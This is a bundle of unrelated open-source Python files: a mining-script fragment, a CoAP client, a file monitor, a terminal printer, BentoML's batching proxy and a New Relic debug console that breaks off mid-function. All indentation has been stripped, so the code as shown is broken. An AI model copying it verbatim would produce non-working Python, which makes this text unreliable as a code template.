print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
coap.py
|
import logging
import logging.config
import random
import socket
import threading
from coapthon.messages.message import Message
from coapthon.messages.response import Response
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.request import Request
from coapthon.serializer import Serializer
import os.path
__author__ = 'giacomo'
logger = logging.getLogger(__name__)
class CoAP(object):
def __init__(self, server, starting_mid, callback):
self._currentMID = starting_mid
self._server = server
self._callback = callback
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
# try:
# # legal
# socket.inet_aton(server[0])
# except socket.error:
# # Not legal
# data = socket.getaddrinfo(server[0], server[1])
# self._server = (data[0], data[1])
host, port = self._server
addrinfo = socket.getaddrinfo(host, None)[0]
if addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.daemon = True
self._receiver_thread.start()
@property
def current_mid(self):
return self._currentMID
@current_mid.setter
def current_mid(self, c):
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message):
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
transaction = self._messageLayer.send_request(request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
self.send_datagram(transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
def send_datagram(self, message):
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
message = serializer.serialize(message)
self._socket.sendto(message, (host, port))
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
args=(transaction, message, future_time, 0))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
and not self.stopped.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not self.stopped.isSet():
logger.debug("retransmit Request")
retransmit_count += 1
future_time *= 2
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
def receive_datagram(self):
logger.debug("Start receiver Thread")
while not self.stopped.isSet():
self._socket.settimeout(1)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout: # pragma: no cover
continue
except socket.error: # pragma: no cover
return
else: # pragma: no cover
if len(datagram) == 0:
print 'orderly shutdown on server end'
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
transaction = self._messageLayer.send_request(transaction.request)
self.send_datagram(transaction.request)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
def _send_ack(self, transaction):
# Handle separate
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
# Handle separate
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
|
file_monitor.py
|
# Copyright 2017 Tufin Technologies Security Suite. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import pyinotify
import logging
import atexit
from abc import abstractmethod
from pytos.common.logging.definitions import COMMON_LOGGER_NAME
logger = logging.getLogger(COMMON_LOGGER_NAME)
class ModifiedFileEventHandler(pyinotify.ProcessEvent):
def my_init(self, callback=None):
self._callback = callback
def process_IN_CLOSE_WRITE(self, event):
self._callback()
def process_IN_MODIFY(self, event):
self._callback()
class FileMonitor:
FILE_CHANGE_MASK = pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MODIFY
def __init__(self, file_paths, watch_mask=FILE_CHANGE_MASK):
self.inotify_watch_manager = pyinotify.WatchManager()
self._file_paths = file_paths
self._event_handler = ModifiedFileEventHandler(callback=self._reload_modified_file)
self._inotify_notifier = pyinotify.Notifier(self.inotify_watch_manager, default_proc_fun=self._event_handler)
self._loop_thread = threading.Thread(target=self._inotify_notifier.loop, daemon=True)
for file_path in self._file_paths:
self.inotify_watch_manager.add_watch(file_path, watch_mask)
self._loop_thread.start()
atexit.register(self._shutdown)
def _shutdown(self):
for watch in self.inotify_watch_manager.watches.copy():
self.inotify_watch_manager.del_watch(watch)
self._inotify_notifier.stop()
self._loop_thread.join(0.1)
def __del__(self):
self._shutdown()
@abstractmethod
def _reload_modified_file(self, *args, **kwargs):
raise NotImplementedError
|
printer.py
|
# coding: utf8
from __future__ import unicode_literals, print_function
from collections import Counter
from contextlib import contextmanager
from multiprocessing import Process
import itertools
import sys
import time
import os
from .tables import table, row
from .util import wrap, supports_ansi, can_render, locale_escape
from .util import MESSAGES, COLORS, ICONS
from .util import color as _color
class Printer(object):
def __init__(
self,
pretty=True,
no_print=False,
colors=None,
icons=None,
line_max=80,
animation="⠙⠹⠸⠼⠴⠦⠧⠇⠏",
animation_ascii="|/-\\",
hide_animation=False,
ignore_warnings=False,
env_prefix="WASABI",
):
"""Initialize the command-line printer.
pretty (bool): Pretty-print output (colors, icons).
no_print (bool): Don't actually print, just return.
colors (dict): Add or overwrite color values, name mapped to value.
icons (dict): Add or overwrite icons. Name mapped to unicode icon.
line_max (int): Maximum line length (for divider).
animation (unicode): Steps of loading animation for loading() method.
animation_ascii (unicode): Alternative animation for ASCII terminals.
hide_animation (bool): Don't display animation, e.g. for logs.
ignore_warnings (bool): Do not output messages of type MESSAGE.WARN.
env_prefix (unicode): Prefix for environment variables, e.g.
WASABI_LOG_FRIENDLY.
RETURNS (Printer): The initialized printer.
"""
env_log_friendly = os.getenv("{}_LOG_FRIENDLY".format(env_prefix), False)
env_no_pretty = os.getenv("{}_NO_PRETTY".format(env_prefix), False)
self._counts = Counter()
self.pretty = pretty and not env_no_pretty
self.no_print = no_print
self.show_color = supports_ansi() and not env_log_friendly
self.hide_animation = hide_animation or env_log_friendly
self.ignore_warnings = ignore_warnings
self.line_max = line_max
self.colors = dict(COLORS)
self.icons = dict(ICONS)
if colors:
self.colors.update(colors)
if icons:
self.icons.update(icons)
self.anim = animation if can_render(animation) else animation_ascii
@property
def counts(self):
"""Get the counts of how often the special printers were fired,
e.g. MESSAGES.GOOD. Can be used to print an overview like "X warnings".
"""
return self._counts
def good(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a success message."""
return self._get_msg(
title, text, style=MESSAGES.GOOD, show=show, spaced=spaced, exits=exits
)
def fail(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an error message."""
return self._get_msg(
title, text, style=MESSAGES.FAIL, show=show, spaced=spaced, exits=exits
)
def warn(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a warning message."""
return self._get_msg(
title, text, style=MESSAGES.WARN, show=show, spaced=spaced, exits=exits
)
def info(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an error message."""
return self._get_msg(
title, text, style=MESSAGES.INFO, show=show, spaced=spaced, exits=exits
)
def text(
self,
title="",
text="",
color=None,
icon=None,
spaced=False,
show=True,
no_print=False,
exits=None,
):
"""Print a message.
title (unicode): The main text to print.
text (unicode): Optional additional text to print.
color (unicode / int): Foreground color.
icon (unicode): Name of icon to add.
spaced (unicode): Whether to add newlines around the output.
show (bool): Whether to print or not. Can be used to only output
messages under certain condition, e.g. if --verbose flag is set.
no_print (bool): Don't actually print, just return.
exits (int): Perform a system exit.
"""
if not show:
return
if self.pretty:
color = self.colors.get(color)
icon = self.icons.get(icon)
if icon:
title = locale_escape("{} {}".format(icon, title)).strip()
if self.show_color:
title = _color(title, fg=color)
title = wrap(title, indent=0)
if text:
title = "{}\n{}".format(title, wrap(text, indent=0))
if exits is not None or spaced:
title = "\n{}\n".format(title)
if not self.no_print and not no_print:
print(title)
if exits is not None:
sys.stdout.flush()
sys.stderr.flush()
sys.exit(exits)
if self.no_print or no_print:
return title
def divider(self, text="", char="=", show=True, icon=None):
"""Print a divider with a headline:
============================ Headline here ===========================
text (unicode): Headline text. If empty, only the line is printed.
char (unicode): Line character to repeat, e.g. =.
show (bool): Whether to print or not.
icon (unicode): Optional icon to display with title.
"""
if len(char) != 1:
raise ValueError(
"Divider chars need to be one character long. "
"Received: {}".format(char)
)
if self.pretty:
icon = self.icons.get(icon)
if icon:
text = locale_escape("{} {}".format(icon, text)).strip()
deco = char * (int(round((self.line_max - len(text))) / 2) - 2)
text = " {} ".format(text) if text else ""
text = _color(
"\n{deco}{text}{deco}".format(deco=deco, text=text), bold=True
)
if len(text) < self.line_max:
text = text + char * (self.line_max - len(text))
if self.no_print:
return text
print(text)
def table(self, data, **kwargs):
"""Print data as a table.
data (iterable / dict): The data to render. Either a list of lists
(one per row) or a dict for two-column tables.
kwargs: Table settings. See tables.table for details.
"""
title = kwargs.pop("title", None)
text = table(data, **kwargs)
if title:
self.divider(title)
if self.no_print:
return text
print(text)
def row(self, data, **kwargs):
"""Print a table row.
data (iterable): The individual columns to format.
kwargs: Row settings. See tables.row for details.
"""
text = row(data, **kwargs)
if self.no_print:
return text
print(text)
@contextmanager
def loading(self, text="Loading..."):
if self.no_print:
yield
elif self.hide_animation:
print(text)
yield
else:
sys.stdout.flush()
t = Process(target=self._spinner, args=(text,))
t.start()
try:
yield
except Exception as e:
# Handle exception inside the with block
t.terminate()
sys.stdout.write("\n")
raise (e)
t.terminate()
sys.stdout.write("\r\x1b[2K") # erase line
sys.stdout.flush()
def _spinner(self, text="Loading..."):
for char in itertools.cycle(self.anim):
sys.stdout.write("\r{} {}".format(char, text))
sys.stdout.flush()
time.sleep(0.1)
def _get_msg(self, title, text, style=None, show=None, spaced=False, exits=None):
if self.ignore_warnings and style == MESSAGES.WARN:
show = False
self._counts[style] += 1
return self.text(
title, text, color=style, icon=style, show=show, spaced=spaced, exits=exits
)
|
marshal.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import logging
import multiprocessing
import time
import traceback
import aiohttp
import aiohttp.web
import psutil
from dependency_injector.wiring import Provide, inject
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import RemoteException
from bentoml.marshal.dispatcher import CorkDispatcher, NonBlockSema
from bentoml.marshal.utils import DataLoader
from bentoml.saved_bundle import load_bento_service_metadata
from bentoml.saved_bundle.config import DEFAULT_MAX_BATCH_SIZE, DEFAULT_MAX_LATENCY
from bentoml.tracing import get_tracer
from bentoml.types import HTTPRequest, HTTPResponse
logger = logging.getLogger(__name__)
def metrics_patch(cls):
class _MarshalService(cls):
@inject
def __init__(
self,
*args,
namespace: str = Provide[BentoMLContainer.config.instrument.namespace],
**kwargs,
):
for attr_name in functools.WRAPPER_ASSIGNMENTS:
try:
setattr(self.__class__, attr_name, getattr(cls, attr_name))
except AttributeError:
pass
from prometheus_client import Counter, Gauge, Histogram
super(_MarshalService, self).__init__(*args, **kwargs)
# its own namespace?
service_name = self.bento_service_metadata_pb.name
self.metrics_request_batch_size = Histogram(
name=service_name + '_mb_batch_size',
documentation=service_name + "microbatch request batch size",
namespace=namespace,
labelnames=['endpoint'],
)
self.metrics_request_duration = Histogram(
name=service_name + '_mb_requestmb_duration_seconds',
documentation=service_name + "API HTTP request duration in seconds",
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
self.metrics_request_in_progress = Gauge(
name=service_name + "_mb_request_in_progress",
documentation='Total number of HTTP requests in progress now',
namespace=namespace,
labelnames=['endpoint', 'http_method'],
)
self.metrics_request_exception = Counter(
name=service_name + "_mb_request_exception",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'exception_class'],
)
self.metrics_request_total = Counter(
name=service_name + "_mb_request_total",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
async def request_dispatcher(self, request):
func = super(_MarshalService, self).request_dispatcher
api_route = request.match_info.get("path", "/")
_metrics_request_in_progress = self.metrics_request_in_progress.labels(
endpoint=api_route, http_method=request.method,
)
_metrics_request_in_progress.inc()
time_st = time.time()
try:
resp = await func(request)
except asyncio.CancelledError:
resp = aiohttp.web.Response(status=503)
except Exception as e: # pylint: disable=broad-except
self.metrics_request_exception.labels(
endpoint=api_route, exception_class=e.__class__.__name__
).inc()
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(status=500)
self.metrics_request_total.labels(
endpoint=api_route, http_response_code=resp.status
).inc()
self.metrics_request_duration.labels(
endpoint=api_route, http_response_code=resp.status
).observe(time.time() - time_st)
_metrics_request_in_progress.dec()
return resp
async def _batch_handler_template(self, requests, api_route):
func = super(_MarshalService, self)._batch_handler_template
self.metrics_request_batch_size.labels(endpoint=api_route).observe(
len(requests)
)
return await func(requests, api_route)
return _MarshalService
@metrics_patch
class MarshalService:
"""
MarshalService creates a reverse proxy server in front of actual API server,
implementing the micro batching feature.
It wait a short period and packed multiple requests in a single batch
before sending to the API server.
It applied an optimized CORK algorithm to get best efficiency.
"""
@inject
def __init__(
self,
bento_bundle_path,
outbound_host="localhost",
outbound_port=None,
outbound_workers: int = Provide[BentoMLContainer.config.api_server.workers],
mb_max_batch_size: int = Provide[
BentoMLContainer.config.marshal_server.max_batch_size
],
mb_max_latency: int = Provide[
BentoMLContainer.config.marshal_server.max_latency
],
request_header_flag: str = Provide[
BentoMLContainer.config.marshal_server.request_header_flag
],
max_request_size: int = Provide[
BentoMLContainer.config.api_server.max_request_size
],
outbound_unix_socket: str = None,
enable_microbatch: bool = Provide[
BentoMLContainer.config.api_server.enable_microbatch
],
):
self._client = None
self.outbound_unix_socket = outbound_unix_socket
self.outbound_host = outbound_host
self.outbound_port = outbound_port
self.outbound_workers = outbound_workers
self.mb_max_batch_size = mb_max_batch_size
self.mb_max_latency = mb_max_latency
self.batch_handlers = dict()
self._outbound_sema = None # the semaphore to limit outbound connections
self.request_header_flag = request_header_flag
self.max_request_size = max_request_size
self.bento_service_metadata_pb = load_bento_service_metadata(bento_bundle_path)
if enable_microbatch:
self.setup_routes_from_pb(self.bento_service_metadata_pb)
if psutil.POSIX:
import resource
self.CONNECTION_LIMIT = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
self.CONNECTION_LIMIT = 1024
logger.info(
"Your system nofile limit is %d, which means each instance of microbatch "
"service is able to hold this number of connections at same time. "
"You can increase the number of file descriptors for the server process, "
"or launch more microbatch instances to accept more concurrent connection.",
self.CONNECTION_LIMIT,
)
def set_outbound_port(self, outbound_port):
self.outbound_port = outbound_port
def fetch_sema(self):
if self._outbound_sema is None:
self._outbound_sema = NonBlockSema(self.outbound_workers)
return self._outbound_sema
def get_client(self):
if self._client is None:
jar = aiohttp.DummyCookieJar()
if self.outbound_unix_socket:
conn = aiohttp.UnixConnector(path=self.outbound_unix_socket,)
else:
conn = aiohttp.TCPConnector(limit=30)
self._client = aiohttp.ClientSession(
connector=conn, auto_decompress=False, cookie_jar=jar,
)
return self._client
def __del__(self):
if getattr(self, '_client', None) is not None and not self._client.closed:
self._client.close()
def add_batch_handler(self, api_route, max_latency, max_batch_size):
'''
Params:
* max_latency: limit the max latency of overall request handling
* max_batch_size: limit the max batch size for handler
** marshal server will give priority to meet these limits than efficiency
'''
if api_route not in self.batch_handlers:
_func = CorkDispatcher(
max_latency,
max_batch_size,
shared_sema=self.fetch_sema(),
fallback=aiohttp.web.HTTPTooManyRequests,
)(functools.partial(self._batch_handler_template, api_route=api_route))
self.batch_handlers[api_route] = _func
def setup_routes_from_pb(self, bento_service_metadata_pb):
for api_pb in bento_service_metadata_pb.apis:
if api_pb.batch:
max_latency = (
self.mb_max_latency or api_pb.mb_max_latency or DEFAULT_MAX_LATENCY
)
max_batch_size = (
self.mb_max_batch_size
or api_pb.mb_max_batch_size
or DEFAULT_MAX_BATCH_SIZE
)
self.add_batch_handler(api_pb.route, max_latency, max_batch_size)
logger.info(
"Micro batch enabled for API `%s` max-latency: %s"
" max-batch-size %s",
api_pb.route,
max_latency,
max_batch_size,
)
async def request_dispatcher(self, request):
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name="[1]http request",
is_root=True,
standalone=True,
sample_rate=0.001,
):
api_route = request.match_info.get("path")
if api_route in self.batch_handlers:
req = HTTPRequest(
tuple((k.decode(), v.decode()) for k, v in request.raw_headers),
await request.read(),
)
try:
resp = await self.batch_handlers[api_route](req)
except RemoteException as e:
# known remote exception
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(
status=e.payload.status,
headers=e.payload.headers,
body=e.payload.body,
)
except Exception: # pylint: disable=broad-except
logger.error(traceback.format_exc())
resp = aiohttp.web.HTTPInternalServerError()
else:
resp = await self.relay_handler(request)
return resp
async def relay_handler(self, request):
data = await request.read()
url = request.url.with_host(self.outbound_host).with_port(self.outbound_port)
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name=f"[2]{url.path} relay",
request_headers=request.headers,
):
try:
client = self.get_client()
async with client.request(
request.method, url, data=data, headers=request.headers
) as resp:
body = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError:
return aiohttp.web.Response(status=503, body=b"Service Unavailable")
return aiohttp.web.Response(
status=resp.status, body=body, headers=resp.headers,
)
async def _batch_handler_template(self, requests, api_route):
'''
batch request handler
params:
* requests: list of aiohttp request
* api_route: called API name
raise:
* RemoteException: known exceptions from model server
* Exception: other exceptions
'''
headers = {self.request_header_flag: "true"}
api_url = f"http://{self.outbound_host}:{self.outbound_port}/{api_route}"
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name=f"[2]merged {api_route}",
request_headers=headers,
):
reqs_s = DataLoader.merge_requests(requests)
try:
client = self.get_client()
async with client.post(api_url, data=reqs_s, headers=headers) as resp:
raw = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError as e:
raise RemoteException(
e, payload=HTTPResponse(status=503, body=b"Service Unavailable")
)
if resp.status != 200:
raise RemoteException(
f"Bad response status from model server:\n{resp.status}\n{raw}",
payload=HTTPResponse(
status=resp.status,
headers=tuple(resp.headers.items()),
body=raw,
),
)
merged = DataLoader.split_responses(raw)
return tuple(
aiohttp.web.Response(
body=i.body, headers=i.headers, status=i.status or 500
)
for i in merged
)
def async_start(self, port):
"""
Start an micro batch server at the specific port on the instance or parameter.
"""
marshal_proc = multiprocessing.Process(
target=self.fork_start_app, kwargs=dict(port=port), daemon=True,
)
marshal_proc.start()
logger.info("Running micro batch service on :%d", port)
def make_app(self):
app = aiohttp.web.Application(client_max_size=self.max_request_size)
app.router.add_view("/", self.relay_handler)
app.router.add_view("/{path:.*}", self.request_dispatcher)
return app
def fork_start_app(
self, port=Provide[BentoMLContainer.config.api_server.port],
):
# Use new eventloop in the fork process to avoid problems on MacOS
# ref: https://groups.google.com/forum/#!topic/python-tornado/DkXjSNPCzsI
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
app = self.make_app()
aiohttp.web.run_app(app, port=port)
|
console.py
|
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import atexit
import cmd
import code
import functools
import glob
import inspect
import optparse
import os
import shlex
import socket
import sys
import threading
import time
import traceback
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
try:
import __builtin__
except ImportError:
import builtins as __builtin__
def _argspec_py2(func):
return inspect.getargspec(func)
def _argspec_py3(func):
a = inspect.getfullargspec(func)
return (a.args, a.varargs, a.varkw, a.defaults)
if hasattr(inspect, "getfullargspec"):
_argspec = _argspec_py3
else:
_argspec = _argspec_py2
try:
from collections import OrderedDict
from inspect import signature
def doc_signature(func):
sig = signature(func)
sig._parameters = OrderedDict(list(sig._parameters.items())[1:])
return str(sig)
except ImportError:
from inspect import formatargspec
def doc_signature(func):
args, varargs, keywords, defaults = _argspec(func)
return formatargspec(args[1:], varargs, keywords, defaults)
from newrelic.api.object_wrapper import ObjectWrapper
from newrelic.api.transaction import Transaction
from newrelic.core.agent import agent_instance
from newrelic.core.config import flatten_settings, global_settings
from newrelic.core.trace_cache import trace_cache
_trace_cache = trace_cache()
def shell_command(wrapped):
args, varargs, keywords, defaults = _argspec(wrapped)
parser = optparse.OptionParser()
for name in args[1:]:
parser.add_option("--%s" % name, dest=name)
@functools.wraps(wrapped)
def wrapper(self, line):
result = shlex.split(line)
(options, args) = parser.parse_args(result)
kwargs = {}
for key, value in options.__dict__.items():
if value is not None:
kwargs[key] = value
return wrapped(self, *args, **kwargs)
if wrapper.__name__.startswith("do_"):
prototype = wrapper.__name__[3:] + " " + doc_signature(wrapped)
if hasattr(wrapper, "__doc__") and wrapper.__doc__ is not None:
wrapper.__doc__ = "\n".join((prototype, wrapper.__doc__.lstrip("\n")))
return wrapper
_consoles = threading.local()
def acquire_console(shell):
_consoles.active = shell
def release_console():
del _consoles.active
def setquit():
"""Define new built-ins 'quit' and 'exit'.
These are simply strings that display a hint on how to exit.
"""
if os.sep == ":":
eof = "Cmd-Q"
elif os.sep == "\\":
eof = "Ctrl-Z plus Return"
else:
eof = "Ctrl-D (i.e. EOF)"
class Quitter(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "Use %s() or %s to exit" % (self.name, eof)
def __call__(self, code=None):
# If executed with our interactive console, only raise the
# SystemExit exception but don't close sys.stdout as we are
# not the owner of it.
if hasattr(_consoles, "active"):
raise SystemExit(code)
# Shells like IDLE catch the SystemExit, but listen when their
# stdin wrapper is closed.
try:
sys.stdin.close()
except Exception:
pass
raise SystemExit(code)
__builtin__.quit = Quitter("quit")
__builtin__.exit = Quitter("exit")
class OutputWrapper(ObjectWrapper):
def flush(self):
try:
shell = _consoles.active
return shell.stdout.flush()
except Exception:
return self._nr_next_object.flush()
def write(self, data):
try:
shell = _consoles.active
return shell.stdout.write(data)
except Exception:
return self._nr_next_object.write(data)
def writelines(self, data):
try:
shell = _consoles.active
return shell.stdout.writelines(data)
except Exception:
return self._nr_next_object.writelines(data)
def intercept_console():
setquit()
sys.stdout = OutputWrapper(sys.stdout, None, None)
sys.stderr = OutputWrapper(sys.stderr, None, None)
class EmbeddedConsole(code.InteractiveConsole):
def write(self, data):
self.stdout.write(data)
self.stdout.flush()
def raw_input(self, prompt):
self.stdout.write(prompt)
self.stdout.flush()
line = self.stdin.readline()
line = line.rstrip("\r\n")
return line
class ConsoleShell(cmd.Cmd):
use_rawinput = 0
def __init__(self):
cmd.Cmd.__init__(self)
self.do_prompt("on")
def emptyline(self):
pass
def help_help(self):
print(
"""help (command)
Output list of commands or help details for named command.""",
file=self.stdout,
)
@shell_command
def do_prompt(self, flag=None):
"""
Enable or disable the console prompt."""
if flag == "on":
self.prompt = "(newrelic:%d) " % os.getpid()
elif flag == "off":
self.prompt = ""
@shell_command
def do_exit(self):
"""
Exit the console."""
return True
@shell_command
def do_process_id(self):
"""
Displays the process ID of the process."""
print(os.getpid(), file=self.stdout)
@shell_command
def do_sys_prefix(self):
"""
Displays the value of sys.prefix."""
print(sys.prefix, file=self.stdout)
@shell_command
def do_sys_path(self):
"""
Displays the value of sys.path."""
print(sys.path, file=self.stdout)
@shell_command
def do_sys_modules(self):
"""
Displays the list of Python modules loaded."""
for name, module in sorted(sys.modules.items()):
if module is not None:
file = getattr(module, "__file__", None)
print("%s - %s" % (name, file), file=self.stdout)
@shell_command
def do_sys_meta_path(self):
"""
Displays the value of sys.meta_path."""
print(sys.meta_path, file=self.stdout)
@shell_command
def do_os_environ(self):
"""
Displays the set of user environment variables."""
for key, name in os.environ.items():
print("%s = %r" % (key, name), file=self.stdout)
@shell_command
def do_current_time(self):
"""
Displays the current time."""
print(time.asctime(), file=self.stdout)
@shell_command
def do_config_args(self):
"""
Displays the configure arguments used to build Python."""
args = ""
try:
# This may fail if using package Python and the
# developer package for Python isn't also installed.
import distutils.sysconfig
args = distutils.sysconfig.get_config_var("CONFIG_ARGS")
except Exception:
pass
print(args, file=self.stdout)
@shell_command
def do_dump_config(self, name=None):
"""
Displays global configuration or that of the named application.
"""
if name is None:
config = agent_instance().global_settings()
else:
config = agent_instance().application_settings(name)
if config is not None:
config = flatten_settings(config)
keys = sorted(config.keys())
for key in keys:
print("%s = %r" % (key, config[key]), file=self.stdout)
@shell_command
def do_agent_status(self):
"""
Displays general status information about the agent, registered
applications, harvest cycles etc.
"""
agent_instance().dump(self.stdout)
@shell_command
def do_applications(self):
"""
Displays a list of the applications.
"""
print(repr(sorted(agent_instance().applications.keys())), file=self.stdout)
@shell_command
def do_application_status(self, name=None):
"""
Displays general status information about an application, last
harvest cycle, etc.
"""
if name is not None:
applications = [agent_instance().application(name)]
else:
applications = agent_instance().applications.values()
for application in applications:
if application is not None:
application.dump(self.stdout)
print(file=self.stdout)
@shell_command
def do_import_hooks(self):
"""
Displays list of registered import hooks, which have fired and
which encountered errors.
"""
from newrelic.config import module_import_hook_results
results = module_import_hook_results()
for key in sorted(results.keys()):
result = results[key]
if result is None:
if key[0] not in sys.modules:
print("%s: PENDING" % (key,), file=self.stdout)
else:
print("%s: IMPORTED" % (key,), file=self.stdout)
elif not result:
print("%s: INSTRUMENTED" % (key,), file=self.stdout)
else:
print("%s: FAILED" % (key,), file=self.stdout)
for line in result:
print(line, end="", file=self.stdout)
@shell_command
def do_transactions(self):
""" """
for item in _trace_cache.active_threads():
transaction, thread_id, thread_type, frame = item
print("THREAD", item, file=self.stdout)
if transaction is not None:
transaction.dump(self.stdout)
print(file=self.stdout)
@shell_command
def do_interpreter(self):
"""
When enabled in the configuration file, will startup up an embedded
interactive Python interpreter. Invoke 'exit()' or 'quit()' to
escape the interpreter session."""
enabled = False
_settings = global_settings()
if not _settings.console.allow_interpreter_cmd:
print("Sorry, the embedded Python interpreter is disabled.", file=self.stdout)
return
locals = {}
locals["stdin"] = self.stdin
locals["stdout"] = self.stdout
console = EmbeddedConsole(locals)
console.stdin = self.stdin
console.stdout = self.stdout
acquire_console(self)
try:
console.interact()
except SystemExit:
pass
finally:
release_console()
@shell_command
def do_threads(self):
"""
Display stack trace dumps for all threads currently executing
within the Python interpreter.
Note that if coroutines are being used, such as systems based
on greenlets, then only the thread stack of the currently
executing coroutine will be displayed."""
all = []
for threadId, stack in sys._current_frames().items():
block = []
block.append("# ThreadID: %s" % threadId)
thr = threading._active.get(threadId)
if thr:
block.append("# Type: %s" % type(thr).__name__)
block.append("# Name: %s" % thr.name)
for filename, lineno, name, line in traceback.extract_stack(stack):
block.append("File: '%s', line %d, in %s" % (filename, lineno, name))
if line:
